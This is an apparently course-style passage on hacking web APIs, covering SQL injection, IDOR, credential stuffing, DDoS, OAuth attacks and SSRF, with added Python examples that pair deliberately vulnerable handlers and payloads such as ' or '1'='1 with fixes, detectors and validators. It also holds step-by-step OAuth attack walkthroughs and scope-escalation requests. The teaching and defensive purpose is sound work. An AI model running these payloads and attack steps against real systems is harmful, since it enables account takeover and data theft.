XPath, XSLT, etc., wherever the input reaches a parser or processor for execution.
Note: Like injection attacks, XSS and CSRF attacks also apply to web APIs.
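The injection above, reproduced as an added example (not EC-Council code) against an in-memory SQLite database: the vulnerable handler builds the query by string concatenation exactly as the text shows, the hardened handler binds custID as a query parameter, and both are fed the decoded path segment from the two URLs. The Customers rows are constructed; the column names follow the query in the text.

```python
"""The SQL injection from the text against an in-memory SQLite database,
with the concatenated query beside a parameterized one.
Added example, not EC-Council code; the Customers rows are constructed."""
import sqlite3
from urllib.parse import unquote


def build_db():
    """Create the Customers table the API reads from, with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Customers (custID TEXT PRIMARY KEY, name TEXT, card TEXT)")
    conn.executemany("INSERT INTO Customers VALUES (?, ?, ?)", [
        ("458", "Alice", "4111 **** **** 1111"),
        ("459", "Bob", "5500 **** **** 0004"),
        ("460", "Carol", "3400 **** **** 009"),
    ])
    return conn


def cust_id_from_path(path):
    """Take the last segment of /api/v1/cust/{custId} and URL-decode it,
    which is what a web framework hands to the handler."""
    return unquote(path.rsplit("/", 1)[1])


def get_customer_vulnerable(conn, cust_id):
    """Builds the query by concatenation, exactly as the text describes."""
    query = "SELECT * FROM Customers where custID='" + cust_id + "'"
    return conn.execute(query).fetchall()


def get_customer_safe(conn, cust_id):
    """Binds custID as a parameter: the quotes in the payload stay data,
    so the injected condition never becomes part of the SQL."""
    return conn.execute("SELECT * FROM Customers where custID=?", (cust_id,)).fetchall()


NORMAL_PATH = "/api/v1/cust/459"
INJECTED_PATH = "/api/v1/cust/'%20or%20'1'='1"


if __name__ == "__main__":
    db = build_db()
    for path in (NORMAL_PATH, INJECTED_PATH):
        cid = cust_id_from_path(path)
        print(repr(cid), "vulnerable ->", len(get_customer_vulnerable(db, cid)),
              "rows; safe ->", len(get_customer_safe(db, cid)), "rows")
```

With the payload the vulnerable query returns every row, card numbers included, while the parameterized one returns nothing because no customer literally has the ID ' or '1'='1. Rejecting non-numeric IDs at the API boundary is a useful second layer, but parameter binding is the fix.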

■ Exploiting Insecure Configurations

o Insecure SSL Configuration: Vulnerabilities in SSL/TLS configuration may allow
attackers to perform MITM attacks. For example, if an API is served with a self-signed
certificate, its clients are typically configured to accept untrusted certificates and so
cannot distinguish the API's certificate from one presented by an attacker. An attacker
may then intercept the traffic between the API and a client, present their own
certificate to the client, and monitor or manipulate the supposedly encrypted traffic
between the client and the API.
o Insecure Direct Object References (IDOR): Direct object references, such as a
customer ID, are used as arguments for API calls, but access rights are not enforced
on the objects, so a user can reach objects they are not authorized to access. These
vulnerabilities can be identified through API metadata: attackers identify the object
parameters and try all possible values (sequential IDs in particular) to access data that
the user is not authorized to see.
o Insecure Session/Authentication Handling: Vulnerabilities such as the reuse of
session tokens, sequential session tokens, long session token timeouts, unencrypted
session tokens, and session tokens embedded in a URL allow attackers to hijack the
client session and steal or manipulate the messages between the client and the API.
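As an added example (not EC-Council code) of the IDOR item above, the script below models the GET /api/v1/cust/{custId} handler twice: once authenticating the caller and then trusting the ID as-is, and once with the ownership check, which answers 404 rather than 403 for foreign records so the response does not confirm which IDs exist. A small sequential-ID probe then shows what one valid session harvests from each. The customer records and the session token are constructed.

```python
"""IDOR: an API handler that resolves a direct object reference without an
ownership check, the hardened version, and the sequential-ID probe an
attacker runs against it. Added example, not EC-Council code; data is constructed."""

CUSTOMERS = {
    458: {"owner": "alice", "card": "4111 **** **** 1111"},
    459: {"owner": "bob", "card": "5500 **** **** 0004"},
    460: {"owner": "carol", "card": "3400 **** **** 009"},
}
SESSIONS = {"tok-bob": "bob"}  # bearer token -> authenticated subject


def get_customer_vulnerable(token, cust_id):
    """GET /api/v1/cust/{custId}: authenticates the caller, then trusts custId."""
    user = SESSIONS.get(token)
    if user is None:
        return 401, None
    record = CUSTOMERS.get(cust_id)
    return (200, record) if record else (404, None)


def get_customer_hardened(token, cust_id):
    """Same endpoint with the ownership check. Foreign records answer 404,
    not 403, so the response does not reveal which IDs exist."""
    user = SESSIONS.get(token)
    if user is None:
        return 401, None
    record = CUSTOMERS.get(cust_id)
    if record is None or record["owner"] != user:
        return 404, None
    return 200, record


def probe_sequential_ids(handler, token, start, count):
    """Walk a range of IDs with one valid session and collect every record
    that belongs to someone else: the attacker's view of the endpoint."""
    me = SESSIONS.get(token)
    leaked = {}
    for cust_id in range(start, start + count):
        status, record = handler(token, cust_id)
        if status == 200 and record["owner"] != me:
            leaked[cust_id] = record["owner"]
    return leaked


if __name__ == "__main__":
    print("vulnerable:", probe_sequential_ids(get_customer_vulnerable, "tok-bob", 455, 10))
    print("hardened:  ", probe_sequential_ids(get_customer_hardened, "tok-bob", 455, 10))
```

Sequential IDs make the probe cheap, but random IDs alone are not a fix: an ID that leaks through any other response (an order listing, a support ticket, a shared link) still opens the record unless the handler checks ownership.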
■ Login/Credential Stuffing Attacks

Attackers often target login and authentication systems because attacks on these
systems are difficult to detect and stop with typical API security solutions. Attackers
perform login attacks or credential stuffing attacks to exploit password reuse across
multiple platforms. Many users reuse the same password across different web
services, so attackers can take credentials stolen from one service and use them to
authenticate to other services.


Credential stuffing attacks do not involve password guessing or brute-forcing the
passwords; instead, attackers try to automate all the previously identified pairs of
credentials using automated tools such as Sentry MBA and PhantomJS to break into an
account. These attacks can also be performed to disrupt API-based services by
preventing valid users from signing in, thereby degrading the user experience and
functionality of the front-facing APIs.
Attackers generally employ bots for different login attempts using previously stolen
data (collected from previous logins) or leaked information belonging to one account to
breach other accounts/services, or bombard the server with a large set of login requests
until the right combination hits. Once the attack is successful, attackers not only take
control of the user account but also perform illegitimate transactions from the account
and conduct fraudulent online campaigns.
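A detection heuristic for the pattern described above, as an added example (not code from the original module): credential stuffing tries each stolen pair only once or twice across many accounts, so per-account lockouts never fire; grouping attempts by source address and looking for many distinct usernames with almost no successes separates it from both legitimate traffic and single-account brute force. The log format, the thresholds and every log line below are constructed.

```python
"""Detect credential-stuffing traffic in authentication logs.

Unlike brute force (many guesses against one account), stuffing tries many
stolen username/password pairs once each, usually from bot IPs, so the
per-account failure counters that drive lockouts stay low. The detector
below keys on the per-source shape of the traffic instead.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class LoginEvent:
    ts: int           # Unix time in seconds
    src_ip: str
    username: str
    success: bool


def parse_log_line(line: str) -> LoginEvent:
    """Parse the constructed log format '<ts> <src_ip> <username> <OK|FAIL>'."""
    ts, ip, user, outcome = line.split()
    return LoginEvent(int(ts), ip, user, outcome == "OK")


def detect_stuffing_sources(events, window=300, min_attempts=20,
                            min_distinct_users=15, max_success_ratio=0.1):
    """Return {src_ip: summary} for every source that, within some `window`
    second span, made at least `min_attempts` logins against at least
    `min_distinct_users` different usernames with a success ratio at or below
    `max_success_ratio`. The thresholds are tuning knobs, not universal constants."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev.src_ip].append(ev)

    flagged = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e.ts)
        start = 0
        for end in range(len(evs)):
            # Advance the window start until the span fits in `window` seconds.
            while evs[end].ts - evs[start].ts > window:
                start += 1
            chunk = evs[start:end + 1]
            if len(chunk) < min_attempts:
                continue
            users = {e.username for e in chunk}
            successes = sum(1 for e in chunk if e.success)
            if (len(users) >= min_distinct_users
                    and successes / len(chunk) <= max_success_ratio):
                flagged[ip] = {
                    "attempts": len(chunk),
                    "distinct_users": len(users),
                    "successes": successes,
                    # Accounts the bot DID get into: these need a forced reset.
                    "compromised": sorted(e.username for e in chunk if e.success),
                }
                break   # one hit per source is enough to alert
    return flagged


def build_sample_log():
    """Constructed log lines (not real data): one stuffing bot, one
    single-account brute-forcer, and one legitimate user who mistypes twice."""
    lines = []
    # Bot: 30 distinct stolen usernames, one attempt each, one of them succeeds.
    for i in range(30):
        lines.append(f"{1000 + 5 * i} 203.0.113.7 user{i:02d} "
                     f"{'OK' if i == 17 else 'FAIL'}")
    # Brute-forcer: hammers a single account, so distinct_users stays at 1.
    for i in range(25):
        lines.append(f"{1000 + 4 * i} 203.0.113.9 alice FAIL")
    # Legitimate user: two typos, then success; far below min_attempts.
    lines += ["1100 198.51.100.5 bob FAIL",
              "1130 198.51.100.5 bob FAIL",
              "1150 198.51.100.5 bob OK"]
    return lines


def run_sample():
    """Parse the constructed log and return the flagged sources."""
    events = [parse_log_line(line) for line in build_sample_log()]
    return detect_stuffing_sources(events)


if __name__ == "__main__":
    for ip, summary in run_sample().items():
        print(ip, summary)
```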

Figure 14.94: Illustration of credential stuffing attack (the attacker feeds a collection of stolen credentials to bots, which try them as Login 1, Login 2, Login 3, and so on against the victim's web services)

■ API DDoS Attacks

A DDoS attack involves saturating an API with a massive volume of traffic from
multiple infected computers (a botnet) to delay the API services to legitimate users.
Although many rate-limit constraints are implemented to protect the server against
crashing, they may not prevent the service delay (API response), thereby degrading the
API's user experience.
Attackers often carry out these attacks using botnets that are created to discover and
stay within the API rate limit control to increase the possibility of an attack. Along with
the regular traffic from legitimate users, attackers' requests can also bypass API security
management systems, load balancers, and other security implementations.
Most of these attacks may not be volumetric. They may also exploit certain API
vulnerabilities to disrupt the API services. For instance, an attacker who gains access to
the API can consume the CPU and other memory resources reserved for the API to delay
the service for as long as possible.


Figure 14.95: Illustration of API DDoS attack (the attacker infects a machine, which becomes a bot, connects to the C&C handler, and looks for other vulnerable systems to infect and so create a botnet; the attacker then sends commands to the bots through the bot command and control center, and the botnet floods the API gateway)

■ Authorization Attacks on API: OAuth Attacks

According to https://auth0.com, OAuth is an authorization protocol that allows a user to
grant limited access to his/her resources on one site to another site without having to
expose his/her credentials.
OAuth provides authorization flows for many computing devices and applications, such as
connecting users to different applications from one application to access the required
information.
The different actors involved in the OAuth process are:

o Owner of the resource: The resource owner, also known as the user, grants an
application permission to access his/her account. The access granted to the application
is limited or conditional, such as granting only read and write permissions.
o Authorization/Resource Server (API): The resource server hosts the secured user
account, and the authorization server validates the user identity and then supplies
the access token to the application.
o Client or Application: The application that seeks access to the user account. To
access the account, the user must authorize the application; then, the API should
validate the authorization.
Steps involved in Authorization Code Grant

There are four steps involved in the authorization code grant, through which attackers
can perform various authorization attacks on the API.
o The user sends a GET request to the client via the user agent to initiate the
authorization process. This is typically done via the "Login with" or "Connect"
button displayed on the client's site.
o The client redirects the user agent to the authorization server with the following
parameters:
• response_type: Code; informs the server which permissions to execute


• client_id: ID assigned to the client
• redirect_uri: URI to which the authorization server redirects the user agent when
the authorization code is provided
• scope: Defines the level of access to the application
• state: Opaque value used for security implementations. The value is also used
for maintaining the state between request and callback
o When the user is authenticated and authorized to access the resource, the
authorization server redirects the user agent to redirect_uri, using the following
parameters:
• code: Authorization code
• state: Value supplied in the abovementioned request
o Using the authorization code, the client requests the access token by adding the
following parameters in the body of a request:
• grant_type: authorization_code
• code: Authorization code received in the previous message
• redirect_uri: URI used in the first request

OAuth Attacks

Various attacks on OAuth performed by manipulating the requests stated above are
described below:

o Attack on 'Connect' Request

Most sites enable users to access other websites such as LinkedIn, Instagram, and
Twitter via OAuth. An attacker can exploit the requests that connect one site to another,
i.e., those sent when the user hits the "Login with" or "Connect" button. The attacker
can then gain illegal access to the victim's account on the client side by connecting
his/her own account to the provider's website.
Steps to perform an attack on "Connect" request:

• The attacker opens a fake account on the provider's website
• The attacker initiates the "Connect" operation with the client through his/her
fake account on the provider's website but halts the authorization server redirect,
which means that the attacker has authorized the client to access his/her resources on
the provider, while the client is not informed.
• The attacker creates a malicious web page that:
✓ Uses CSRF to log the user out of the provider.
✓ Again uses CSRF to log the user in to the provider using the attacker's fake
account credentials.


✓ Spoofs the first request to connect the provider account with the client. It is
just another GET request. It is usually performed inside the <iframe> tag to
make the user unaware of this action.

• Once the victim opens the attacker's malicious page, his/her account gets logged
out on the provider and connects as a fake account. Then, the attacker's fake
account is connected with the victim's account on the client. The victim does not
ask the client for permission, as the attacker has already approved it.
• Hence, the attacker can log into the victim's account on the client side using
his/her fake account on the provider.
o Attack on 'redirect_uri'

While registering, the client usually specifies its domain, and only redirect_uri
values on that domain are permitted. If an attacker can identify a vulnerability such as
XSS on a web page in the client domain, he/she can exploit it to capture the
authorization code.
Steps to perform an attack on 'redirect_uri':

• The attacker leaks data through a vulnerable page on the client domain:
https://xyz.com/vuln
• The attacker installs malicious JavaScript on the page; the page then sends the
URL loaded in the browser (along with the parameters and fragments) to the attacker
• The attacker creates a page that prompts the user to open a malicious link:
https://provider.com/oauth/authorize?client_id=CLIENTID&response_type=auth_code&redirect_uri=https%3A%2F%2Fxyz.com%2Fvuln
• When the victim opens the malicious link, the user agent is redirected to
https://xyz.com/vuln?code=CODE, and the CODE is then exfiltrated to the attacker
• Now, the attacker uses the retrieved code to obtain the access token via the
authentic 'redirect_uri', such as https://xyz.com/oauth/callback?code=CODE.
o CSRF on Authorization Response

The attacker performs a CSRF attack to connect a fake account on the provider with
the victim's account on the client side. This attack exploits a third request related to
authorization code grant.
Steps to perform CSRF on authorization response:

• The attacker opens a fake account on the provider
• The attacker starts a "Connect" operation with the client through his/her fake
account on the provider, but halts the authorization server redirect, which means
that the attacker has authorized the client to access his/her resources on the


provider, while the client is not informed. Hence, the attacker stores the
authorization code.
• The attacker persuades the user to send a request to
https://xyz.com/<provider>/login?code=Auth_Code. This can be done by luring the
victim into opening a malicious page that embeds the abovementioned link as the
source of an img or script tag.
• When the victim logs into the client, the attacker's fake account is connected to
the victim's account
• Now, the attacker can sign in as the victim on the client by logging in with his/her
fake account on the provider
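The two checks whose absence the 'redirect_uri' attack and the CSRF-on-authorization-response attack above rely on, as an added example (not code from the original module or from auth0.com): exact-match validation of registered redirect_uri values on the authorization server, and a client that binds a random state to the browser session and refuses callbacks that do not carry it. The client id, URLs and endpoint names are assumptions taken from the walkthrough.

```python
"""Client- and server-side checks for the authorization code grant.

Exact redirect_uri matching (authorization server) denies the code to an XSS
page on the client's domain; a per-session random `state` (client) denies a
code the attacker obtained for their own account being planted into the
victim's session.
"""
import secrets
from urllib.parse import parse_qs, urlencode, urlparse


class RedirectUriRegistry:
    """Authorization-server side. A redirect_uri is accepted only if it is
    byte-for-byte one of the values registered for that client_id; matching
    on the domain alone is what lets https://xyz.com/vuln receive the code."""

    def __init__(self):
        self._registered = {}          # client_id -> set of exact URIs

    def register(self, client_id, *redirect_uris):
        self._registered[client_id] = set(redirect_uris)

    def is_allowed(self, client_id, redirect_uri):
        return redirect_uri in self._registered.get(client_id, set())


class OAuthClient:
    """Client side, with CSRF protection on the callback via `state`."""

    def __init__(self, client_id, redirect_uri, authorize_endpoint):
        self.client_id = client_id
        self.redirect_uri = redirect_uri
        self.authorize_endpoint = authorize_endpoint

    def start_login(self, session):
        """First request ("Login with"/"Connect"): mint an unguessable state,
        bind it to the browser session, and build the authorization request."""
        state = secrets.token_urlsafe(32)
        session["oauth_state"] = state
        query = urlencode({
            "response_type": "code",
            "client_id": self.client_id,
            "redirect_uri": self.redirect_uri,
            "scope": "openid email",
            "state": state,
        })
        return f"{self.authorize_endpoint}?{query}"

    def handle_callback(self, session, callback_url):
        """Third request: accept the code only if the callback carries the
        state this very session minted. A planted link such as
        .../login?code=Auth_Code carries no state (or the attacker's), so it
        is refused; the state is consumed so a callback cannot be replayed."""
        expected = session.pop("oauth_state", None)
        params = parse_qs(urlparse(callback_url).query)
        received = params.get("state", [None])[0]
        code = params.get("code", [None])[0]
        if expected is None:
            return False, "no login in progress for this session"
        if received is None:
            return False, "missing state"
        if not secrets.compare_digest(received.encode(), expected.encode()):
            return False, "state mismatch"
        if not code:
            return False, "missing code"
        return True, code
```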
o Access Token Reusage

OAuth requires unique access tokens for individual clients. It ensures that these
tokens saved on the authorization server are mapped to the relevant scopes and expiry
times. However, access tokens provided for "clientA" can work for "clientB". Attackers
exploit this to attack clients that use the implicit grant.
Steps to reuse access tokens:

• The attacker develops a legitimate client application "clientA" and enrolls it with
some provider
• Now, the attacker lures the victim into accessing "clientA" and gains illegal
access to the victim's access token on "clientA"
• Let us consider that the victim also accesses "clientB", which uses the implicit
grant. In such a case, the authorization server redirects the user agent to
https://clientB.com/callback#access_token=ACCESSTOKEN. Now, the attacker can open
this URL with the access_token obtained from "clientA".
• The attacker is verified as a valid entity by "clientB". Therefore, one access token
is sufficient for use on many clients using the implicit grant.
o SSRF Using Dynamic Client Registration Endpoint

In black-box testing on an OAuth server, the analysis may not detect hidden URLs
such as the Dynamic Client Registration endpoint. These URLs are used as special
registration endpoints and are mapped to /register. The attacker can perform an
SSRF attack using these URLs associated with the parameters, as demonstrated in
the following POST request:
POST /connect/register HTTP/1.1
Content-Type: application/json
Host: server.certifiedhacker.com
Authorization: Bearer eyJhbGciOiJSUzI1NiJ9.eyJ
{
  "application_type": "web app",
  "redirect_uris": ["https://client.certifiedhacker.com/callback"],
  "client_name": "Sample Test",
  "logo_uri": "https://client.certifiedhacker.com/logo.png",
  "subject_type": "pairwise",
  "sector_identifier_uri": "https://certifiedhacker.com/rdrct_uris.json",
  "token_endpoint_auth_method": "client_secret_basic",
  "jwks_uri": "https://client.certifiedhacker.com/public_keys.jwks",
  "contacts": ["[email protected]"],
  "request_uris": ["https://client.certifiedhacker.com/rf.txt"]
}

The above POST request has several URL-valued parameters that can trigger an SSRF
attack. The vulnerable parameters are logo_uri, jwks_uri, and request_uris.

• logo_uri: After registering a new client, the server authorizes an endpoint with
the new client_id and displays the logo referenced by the logo_uri parameter. If
the server fetches the logo, an SSRF attack might occur.
• jwks_uri: The JWT key is important for the server to validate an endpoint's
token client authentication. If the client application is registered with a malicious
URL in the jwks_uri parameter, an SSRF attack may occur; thus, the attacker
can obtain the authorization code for all the users.
• request_uris: This parameter contains an array of URLs that are used while
authorizing an endpoint. The URL contains the requested information as a JWT. It is
possible to perform an SSRF attack by using the request_uri parameter.
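One way an authorization server can screen the URL-valued registration fields named above before it fetches any of them, as an added example (not code from the original module or from any OAuth library): the scheme must be https, the host must not be a loopback/private/link-local address, and a DNS name is resolved through an injected resolver so the check can run offline. The blocked-hostname list, the sample registration and the fake resolver are constructed assumptions.

```python
"""Screen URL-valued fields of a dynamic client registration before the
server fetches them (logo_uri, jwks_uri, sector_identifier_uri, request_uris).
Refusing non-https schemes and addresses inside the server's own network
removes the server-side request primitive described above.
"""
import ipaddress
from urllib.parse import urlparse

# Constructed deny-list of names that must never be fetched server-side.
BLOCKED_HOSTNAMES = {"localhost"}
BLOCKED_SUFFIXES = (".internal", ".local", ".localhost")


def is_public_address(addr: str) -> bool:
    """True only for globally routable unicast addresses (IPv4 or IPv6).
    Raises ValueError when `addr` is not an IP literal."""
    ip = ipaddress.ip_address(addr)
    return ip.is_global and not ip.is_multicast


def check_outbound_url(url: str, resolver=None):
    """Return (ok, reason). `resolver(host) -> list[str]` is injected so the
    check runs offline; production code passes a real DNS lookup and must
    also pin the resolved address for the actual fetch, otherwise a record
    that changes between check and fetch (DNS rebinding) defeats the check."""
    parsed = urlparse(url)
    if parsed.scheme != "https":
        return False, "scheme must be https"
    host = parsed.hostname
    if not host:
        return False, "missing host"
    if parsed.username or parsed.password:
        return False, "credentials in URL not allowed"
    host = host.lower()
    if host in BLOCKED_HOSTNAMES or host.endswith(BLOCKED_SUFFIXES):
        return False, "blocked hostname"
    try:
        # An IP literal can be judged immediately.
        if is_public_address(host):
            return True, "ok"
        return False, "non-public IP literal"
    except ValueError:
        pass   # not an IP literal, so it is a DNS name
    if resolver is not None:
        addrs = resolver(host)
        if not addrs or not all(is_public_address(a) for a in addrs):
            return False, "resolves to a non-public address"
    return True, "ok"


def validate_registration(registration: dict, resolver=None):
    """Return one problem string per offending URL field; an empty list means
    the registration may proceed to the fetch stage."""
    fields = [(name, registration.get(name))
              for name in ("logo_uri", "jwks_uri", "sector_identifier_uri")]
    fields += [("request_uris", u) for u in registration.get("request_uris", [])]
    problems = []
    for name, url in fields:
        if url is None:
            continue
        ok, reason = check_outbound_url(url, resolver)
        if not ok:
            problems.append(f"{name}: {reason}")
    return problems


# Constructed registration: hostnames from the page's request, plus two
# illustrative internal targets that the check must refuse.
SAMPLE_REGISTRATION = {
    "redirect_uris": ["https://client.certifiedhacker.com/callback"],
    "logo_uri": "http://client.certifiedhacker.com/logo.png",
    "jwks_uri": "https://10.0.0.5/public_keys.jwks",
    "request_uris": ["https://169.254.10.20/",
                     "https://client.certifiedhacker.com/rf.txt"],
}

if __name__ == "__main__":
    for problem in validate_registration(SAMPLE_REGISTRATION):
        print("rejected:", problem)
```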
o WebFinger User Enumeration

WebFinger is a standard protocol used to display all user information through a GET
request. In OAuth authorization, "/.well-known/webfinger" validates an
endpoint with a username that does not exist on the server. The attacker can use
"anonymous" as a username to validate themselves as a genuine user account on
the server. As the account is not found or used by the OpenID client application, it
can be determined that the request does not originate from the browser side. Hence,
the response from the server contains a valid URL in the form of
"http://host/user" in place of the rel parameter value.


o Exploiting Flawed Scope Validation

Attackers exploit vulnerabilities of OAuth service providers to achieve scope
escalation, which results in the exfiltration of additional data of the resource owner.
If an attacker can find a way to modify the scope parameter in the authorization
request of an access token, they can lure OAuth service providers with flawed scope
validation into granting additional scope. This scope parameter provides the scope of
access for the client application, which is either defined dynamically by the client or
by using standard scope entities such as those of OpenID Connect.

Steps to Exploit Flawed Scope Validation

Attackers use different grant types to exploit flawed scope validation. The following
are the two grant types used by attackers during the attack.

• Authorization code grant type:

✓ The attacker registers their malicious client application, https://xyz.com, with
the OAuth service that is used by the targeted resource owner.
✓ When the victim attempts to open the attacker's malicious client application,
the attacker initiates a request to the OAuth service provider for access to
the user's email address using the OpenID email scope.
✓ When the user authorizes the request, the attacker receives an authorization
code in response.
✓ Now, the attacker initiates the scope escalation for the targeted client by making
their malicious client application add an additional scope to the token request:
client_id=12345&client_secret=SECRET&redirect_uri=https://xyz.com/callback&grant_type=authorization_code&code=a1b2c3d4e5f6g7h8&scope=openid%20email%20profile
✓ After approval from the OAuth server, the attacker obtains a new access
token containing the newly added scope:
"access_token": "z0y9x8w7v6u5",
"token_type": "Bearer",
"expires_in": 3600,
"scope": "openid email profile",
✓ Now, the attacker holds a valid access token and can access and pocket
additional data by using the escalated scope in ordinary API calls to the
client.

• Implicit grant type:

✓ The attacker targets a vulnerable client application that utilizes an implicit
grant-type process to attain access tokens from its clients through an open
browser: https://xyz.com/vuln


✓ When the targeted client application obtains approval from its client and the
corresponding access token is generated, the attacker attempts to pocket it.
✓ After attaining the access token from the targeted client application, the
attacker initiates a new request to its corresponding OAuth service provider
with an altered scope /userinfo.
✓ As the client has already granted permission for data access to the targeted
client application, the attacker is now able to access additional information
from the user until the OAuth server verifies and validates the scope
parameter.
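The scope check that the flawed servers in both walkthroughs above are missing, as an added example (not code from the original module): a minimal token endpoint that binds the approved scope to the authorization code and refuses a wider scope in the exchange (authorization code grant), plus a /userinfo endpoint that takes its scope from the token rather than from the request (implicit grant). The client record, secret, scope-to-claim mapping and user record are constructed.

```python
"""Scope handling that closes the escalation path described above.

The approved scope is bound to the authorization code when the resource owner
consents; the token endpoint may narrow it but never widen it, and the
resource endpoint reads scope from the token, never from the request.
"""
import secrets
from dataclasses import dataclass

# Constructed registered client, using the ids from the walkthrough.
CLIENTS = {"12345": {"secret": "SECRET", "redirect_uri": "https://xyz.com/callback"}}

# Constructed scope-to-claims mapping, loosely following OpenID Connect.
SCOPE_CLAIMS = {"openid": ("sub",), "email": ("email",), "profile": ("name",)}

# Constructed resource-owner record.
USERS = {"victim": {"sub": "victim", "email": "victim@example.com", "name": "V. Owner"}}


@dataclass
class CodeRecord:
    client_id: str
    redirect_uri: str
    user: str
    scope: tuple   # exactly what the resource owner approved


class AuthorizationServer:
    def __init__(self):
        self._codes = {}    # authorization code -> CodeRecord (single use)
        self._tokens = {}   # access token -> (user, scope)

    def issue_code(self, client_id, redirect_uri, user, approved_scope):
        """Called after the consent screen; records the approved scope."""
        code = secrets.token_urlsafe(16)
        self._codes[code] = CodeRecord(client_id, redirect_uri, user,
                                       tuple(approved_scope.split()))
        return code

    def token(self, **req):
        """Token endpoint for grant_type=authorization_code."""
        if req.get("grant_type") != "authorization_code":
            return {"error": "unsupported_grant_type"}
        client = CLIENTS.get(req.get("client_id"))
        if client is None or client["secret"] != req.get("client_secret"):
            return {"error": "invalid_client"}
        rec = self._codes.pop(req.get("code", ""), None)   # consume: no replay
        if (rec is None or rec.client_id != req.get("client_id")
                or rec.redirect_uri != req.get("redirect_uri")):
            return {"error": "invalid_grant"}
        scope = rec.scope
        if "scope" in req:
            # A scope in the exchange may only narrow the approved set. The
            # flaw on this page is a server that takes the request's scope at
            # face value and mints "openid email profile" from an
            # "openid email" consent.
            wanted = tuple(req["scope"].split())
            if not set(wanted) <= set(rec.scope):
                return {"error": "invalid_scope"}
            scope = wanted
        access_token = secrets.token_urlsafe(16)
        self._tokens[access_token] = (rec.user, scope)
        return {"access_token": access_token, "token_type": "Bearer",
                "expires_in": 3600, "scope": " ".join(scope)}

    def userinfo(self, access_token, **request_params):
        """Resource endpoint. `request_params` (e.g. a client-supplied scope,
        as in the implicit-grant variant above) are deliberately ignored; the
        claims released depend only on the scope bound to the token."""
        rec = self._tokens.get(access_token)
        if rec is None:
            return {"error": "invalid_token"}
        user, scope = rec
        return {claim: USERS[user][claim]
                for s in scope for claim in SCOPE_CLAIMS.get(s, ())}
```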


Other Techniques to Hack an API

Reverse Engineering: Attackers invoke APIs in the reverse order to identify flaws residing in the API that can be obfuscated in real-time usage

User Spoofing: Attackers masquerade as a trusted user to perform various attacks such as privilege escalation by redirecting the URI function to another URI, injecting code that serves as text, or bombarding the API with excessive data to cause buffer overflow

Man-in-the-Middle Attacks: Attackers perform MITM attacks using domain squatting and copying API resource locations to provide fake links that appear to be legitimate in API interactions

Session Replay Attacks: Attackers perform session replay to rewind the session time and prompt the server to disclose information as though a similar request is made a second time

Social Engineering: Social engineering techniques do not target the API or machine code, and are instead employed to trick users into divulging their credentials or other sensitive information to perform further attacks

Other Techniques to Hack an API


Different ways to hack an API are discussed below:
■ Reverse Engineering
Viewing APIs from the developer's viewpoint can be flawed because it checks only whether
an API is working as intended. Once it is deployed for the end-user experience, it may
not work as it worked in the developer environment. This is what attackers often
exploit while reverse-engineering the API. Attackers invoke APIs in reverse order
to identify the flaws residing in the API that can be obscured in real-time usage.
For instance, consider an order placed using the same account that was already used for
an earlier booking. The order flow appears to be something like this:
o Order made
o Order linked with the account
o Order is accepted
Attackers can use this flow in the process of reverse engineering an API. If the accepting
mechanism is carried out in the reverse order, the internal API used to connect orders to
accounts can be crashed, thereby forcing the browser to expose the account details of a
user.
■ User Spoofing
It is a process of concealing the original identity and masquerading as some other valid
entity. In most cases, the attacker tries to pose as a legitimate user with
special privileges and provides free data access to additional users to cause more


damage. Attackers use details obtained from phishing or any other information leaking
methods to masquerade as the original user.
If attackers can successfully break into the system, they can perform some type of
privilege escalation attack by redirecting the URI function to another URI, injecting code
that serves as text, or bombarding the API with excessive data, causing buffer overflow.
■ Man-in-the-Middle Attacks

In an MITM attack, attackers watch the API communications with the server or pose as
the server by intercepting the request calls. The attacker's motive, in this case, is to
provide fake links that appear legitimate in the API interaction. These attacks can be
carried out by domain squatting and copying the API resource location.
For instance, the user might make a resource call via API.io/media/function, while the
attacker is sitting at APO.io/media/function. A change in a single character can make a
significant difference. If the user clicks on the second link without noticing the
difference in the URL, he/she will be providing sensitive information to an attacker-
controlled server.
■ Session Replay Attacks

Session replay attacks can be launched on websites and other sources that initiate and
store sessions. These attacks are usually performed to obtain session IDs and replay
them to the server. In this case, attackers rewind the session time and prompt the
server to disclose the information as though a similar request is made once again.
■ Social Engineering

Although it may not be a direct API attack, social engineering can be performed through
the API. Social engineering does not affect the API or the machine code; it is a technique
employed to trick users into divulging their credentials or other sensitive information.
Phishing is a technique often used to send malicious links to users via email to reset or
validate their security credentials. Spear-phishing is another sophisticated social
engineering attack in which additional data is provided to the users, making them
believe that they are interacting with a valid endpoint.
If the user enters his/her credentials on the fake link, attackers can capture the data and
launch further attacks, such as modifying the account details and making illegitimate
online transactions, using the stolen credentials.


REST API Vulnerability Scanning

REST API vulnerabilities introduce risks that are similar to those of web applications, such as critical data theft and intermediate data tampering. Performing thorough scanning on REST APIs can expose various underlying vulnerabilities that attackers can exploit. Attackers can use tools such as Astra to carry out REST API vulnerability scanning.

Astra allows attackers to detect REST APIs that are vulnerable to attacks such as XSS, SQL injection, information leakage, CSRF, broken authentication, and session management.

[Slide screenshot: Astra scanning report, https://github.com]

REST API Vulnerability Scanning


REST API vulnerabilities introduce the same risks as security issues in web applications and
websites, including critical data theft and intermediate data tampering. Performing
thorough scanning on REST APIs can expose various underlying vulnerabilities that attackers can
exploit. Attackers can use tools such as Astra, Fuzzapi, w3af, and AppSpider to carry out REST
API vulnerability scanning.
■ Astra

Source: https://github.com
Attackers use the Astra tool to detect and exploit underlying vulnerabilities in a REST
API. Astra can discover and test authentication flows such as login and logout; this feature
makes it easy to incorporate it into a CI/CD pipeline. Astra can take an API collection as
input; hence, it can also be used for scanning REST APIs.
Astra allows attackers to detect REST APIs that are vulnerable to attacks such as XSS,
SQL injection, information leakage, CSRF, broken authentication and session
management, JWT attacks, blind XXE injection, CRLF detection, CORS misconfiguration,
and rate limiting.


Figure 14.96: Screenshot of Astra (scanning report served at 127.0.0.1:8094/reports.html). The report shows the following finding:

Scanning Report: CORS Misconfiguration in http://192.168.0.4/token.php
  Name: CORS Misconfiguration
  Impact: High
  Request headers:
    Content-Type: application/json
    Origin: http://attackersite.com
  Response headers:
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Origin: *
    Connection: Keep-Alive
    Content-Length: 28
    Content-Type: text/html; charset=UTF-8
    Date: Sat, 31 Mar 2018 06:53:06 GMT
    Keep-Alive: timeout=5, max=100
